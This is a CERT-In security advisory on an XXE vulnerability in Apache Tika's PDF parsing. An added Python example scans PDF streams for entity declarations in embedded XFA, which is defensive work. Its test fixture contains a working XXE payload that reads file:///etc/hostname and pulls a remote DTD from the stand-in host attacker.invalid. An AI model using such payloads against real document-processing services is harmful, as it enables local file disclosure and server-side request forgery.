[CIVN-2025-0363] XML External Entity (XXE) injection vulnerability in Apache Tika
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
XML External Entity (XXE) injection vulnerability in Apache Tika
Indian Computer Emergency Response Team (CERT-In) (https://www.cert-in.org.in)
Severity Rating: CRITICAL
Software Affected
Apache Tika Core Versions 1.13 through 3.2.1
Apache Tika Parsers Versions 1.13 before 2.0.0
Apache Tika PDF parser module Versions 2.0.0 through 3.2.1
Overview
An XML External Entity (XXE) vulnerability has been reported in the PDF parsing functionality of Apache Tika. An attacker who can get a crafted PDF processed by an affected system could use it to read sensitive local data or to trigger Server-Side Request Forgery (SSRF) from that system.
Target Audience:
All organizations and individuals using Apache Tika.
Risk Assessment:
High risk of sensitive data disclosure and Server-Side Request Forgery (SSRF).
Impact Assessment:
Potential of unauthorized access to local files, Server-Side Request Forgery (SSRF) against internal or external services, and denial-of-service (DoS) conditions.
Description
Apache Tika is a content analysis toolkit designed to detect, parse, and extract text and metadata from a wide range of file formats for indexing, search, and data processing applications.
A critical vulnerability exists in Apache Tika because its PDF parsing functionality does not properly restrict XML External Entity (XXE) references in the XML it extracts from a document. PDF forms can carry their form definition and data as XFA (XML Forms Architecture), an XML document embedded in the PDF, and Tika's PDF parser processes that XML. An attacker who can get a crafted PDF processed by an affected system, for example by uploading it to a service that runs Tika to extract text and metadata from user-supplied files, can place entity declarations in the XFA content that point at local files or at URLs reachable from the server.
Successful exploitation of this vulnerability could allow the attacker to read sensitive data from the affected system, to make it issue requests to internal or external services (SSRF), or to cause a denial-of-service condition.
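Added worked example (not part of the CERT-In advisory and not Apache Tika code): a Python triage scanner that walks a PDF's stream objects, inflates /FlateDecode streams and flags any XFA stream whose XML declares a DOCTYPE or externally sourced entities, which is the construct a crafted PDF of the kind described above has to carry. The two PDFs it builds, the XFA markup, the file:///etc/hostname path and the attacker.invalid URL are constructed fixtures for this example only. The stream walking is regex based (no cross-reference parsing, no object streams, only /FlateDecode is decoded), so this is a quick pre-ingest check for triage, not a PDF parser and not a substitute for applying the vendor update.

```python
import re
import zlib
from typing import Optional

# A stream object's dictionary (one level of nested << >> allowed) followed by the stream keyword.
STREAM_DICT = re.compile(rb"<<((?:[^<>]|<<[^<>]*>>)*)>>\s*stream\r?\n")
# Direct integer /Length only; an indirect "/Length 5 0 R" falls back to searching for endstream.
LENGTH_RE = re.compile(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)")
FILTER_RE = re.compile(rb"/Filter\s*(/\w+|\[[^\]]*\])")
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# General or parameter entity whose value is fetched from outside the document: the XXE primitive.
EXT_ENTITY_RE = re.compile(rb"<!ENTITY\s+%?\s*([^\s>]+)\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)

# Constructed XFA payload of the shape an XXE attempt against a PDF parser takes: one entity
# reads a local file (data disclosure), one parameter entity pulls a remote DTD (the SSRF vector).
MALICIOUS_XFA = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE xdp:xdp [\n'
    b'  <!ENTITY secret SYSTEM "file:///etc/hostname">\n'
    b'  <!ENTITY % dtd SYSTEM "http://attacker.invalid/xfa.dtd">\n'
    b'  %dtd;\n'
    b']>\n'
    b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">\n'
    b'  <template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">\n'
    b'    <subform name="form1"><field name="note"><value><text>&secret;</text></value></field></subform>\n'
    b'  </template>\n'
    b'</xdp:xdp>\n'
)
# Same constructed form without a DOCTYPE: the normal case that must not be flagged.
BENIGN_XFA = (
    b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">\n'
    b'  <template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">\n'
    b'    <subform name="form1"><field name="note"><value><text>hello</text></value></field></subform>\n'
    b'  </template>\n'
    b'</xdp:xdp>\n'
)


def build_pdf(xfa_xml: bytes, compress: bool = False) -> bytes:
    """Build a minimal constructed PDF whose AcroForm points at an XFA stream (fixture for this example)."""
    body = zlib.compress(xfa_xml) if compress else xfa_xml
    filt = b" /Filter /FlateDecode" if compress else b""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /AcroForm << /XFA 4 0 R >> >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Length %d%s >>\nstream\n" % (len(body), filt) + body + b"\nendstream",
    ]
    out, offsets = bytearray(b"%PDF-1.7\n"), []
    for num, obj in enumerate(objs, 1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + obj + b"\nendobj\n"
    xref_at = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref_at)
    return bytes(out)


def decode_stream(dictionary: bytes, body: bytes) -> Optional[bytes]:
    """Return the stream's decoded bytes, or None when a filter other than /FlateDecode is involved."""
    m = FILTER_RE.search(dictionary)
    names = re.findall(rb"/(\w+)", m.group(1)) if m else []
    if not names:
        return body
    if names == [b"FlateDecode"]:
        try:
            return zlib.decompress(body)
        except zlib.error:
            return None
    return None


def scan_pdf(data: bytes) -> list:
    """Flag every decodable stream whose XML carries a DOCTYPE and list its externally sourced entities."""
    findings = []
    for m in STREAM_DICT.finditer(data):
        dictionary, start = m.group(1), m.end()
        length = LENGTH_RE.search(dictionary)
        if length:
            body = data[start:start + int(length.group(1))]
        else:
            end = data.find(b"endstream", start)
            body = (data[start:end] if end != -1 else data[start:]).rstrip(b"\r\n")
        payload = decode_stream(dictionary, body)
        if payload is None or not DOCTYPE_RE.search(payload):
            continue  # undecodable streams are skipped here; a production scanner should report them as unscanned
        findings.append({
            "offset": m.start(),
            "xfa": b"xfa.org" in payload or b"<xdp:xdp" in payload,
            "external_entities": [n.decode("latin-1") for n in EXT_ENTITY_RE.findall(payload)],
        })
    return findings


if __name__ == "__main__":
    for name, pdf in [("constructed-malicious.pdf", build_pdf(MALICIOUS_XFA, compress=True)),
                      ("constructed-benign.pdf", build_pdf(BENIGN_XFA, compress=True))]:
        hits = scan_pdf(pdf)
        print(f"{name}: {'SUSPICIOUS ' + repr(hits) if hits else 'no DOCTYPE in decoded streams'}")
```

Running the script scans the two constructed PDFs; for real files call scan_pdf() on their bytes. A non-empty result means the document declares entities inside embedded XML and should be quarantined rather than handed to an unpatched Tika instance. Any DOCTYPE is reported, not only SYSTEM/PUBLIC entities, because internal entity expansion is the denial-of-service side of the same class of issue; streams using filters the example does not decode are skipped silently and should be treated as unscanned, not as clean.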
Solution
Apply the updates referenced in the Apache Tika announcement:
https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k
Vendor Information
Apache Tika
https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k
References
Apache Tika
https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k
CVE Name
CVE-2025-66516
- --
Thanks and Regards,
CERT-In
Incident Response Help Desk
e-mail: incident@cert-in.org.in
Phone: +91-11-22902657
Toll Free Number: 1800-11-4949
Toll Free Fax : 1800-11-6969
Web: http://www.cert-in.org.in
PGP Fingerprint: A768 083E 4475 5725 B81A A379 2156 C0C0 B620 D0B4
PGP Key information:
https://www.cert-in.org.in/s2cMainServlet?pageid=CONTACTUS
Postal address:
Indian Computer Emergency Response Team (CERT-In)
Ministry of Electronics and Information Technology
Government of India
Electronics Niketan
6, C.G.O. Complex
New Delhi-110 003
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEE6r4Iam/Ey0c/KakL3jCgcSdcys8FAmlBVmAACgkQ3jCgcSdc
ys91Og/+MeNNE9uD7ifIcq5vktaI3LJUqFKGdfUfgMFxJOmdyIiTUGetWEnckW+/
rHMK0cyPx31FFmfidBHR5I9trOa0akAplUUQxuUKZnqDB5oc6NTOaY6h4rHqyaSw
aQwmi+IsiHE4I9tY+TaFROL/bA/JcPxCnhD5zrD/mS81pdLvJ8kcd20qohSTduKv
qRggu6DLzAcVLnD0LPZJ6BdoG5BWYI8OW4GgT5WQCdQ4eZUSm96/gCBOnt7cHLxd
P3gtU7E0NTqLYO1lDAA5lPNmpqHzhlhONyzuI245qfk+KhaagHMuDeI9Kw87yvCH
Y0CooT0840wZlU3NQVs9d8oTqJLwEltMRNU6hRgRoAFRVYwQRbx1HTVGhVgBwFPJ
nAdZdNbaY5khqcxc6yifKq3CeCRsUf5wwxUwhsmgpnhOBgCvKd3Fs/3oWbe/moZx
RWom6jz985Dc9Gz+FNu5kwGba1brMizemzymzZvxWrJQOANgcoQIhLrsHn4dtpeW
0d96aTd43wYJLxqAbOFjys6ZV40tgRKHEERXcXiYO+vooIHCi9cAnAt0mWaXpyQq
9MDtzRWZoDxUJoSkmCq218KKfFrnZXGmJNk49Y2j9yyrfwDIJp9dQEKxy2URVQg8
08h6Aei/DmhfMjNTxiJX9vhVQu4Qj9E476HRk8vyj+K22/Dan+E=
=dC/f
-----END PGP SIGNATURE-----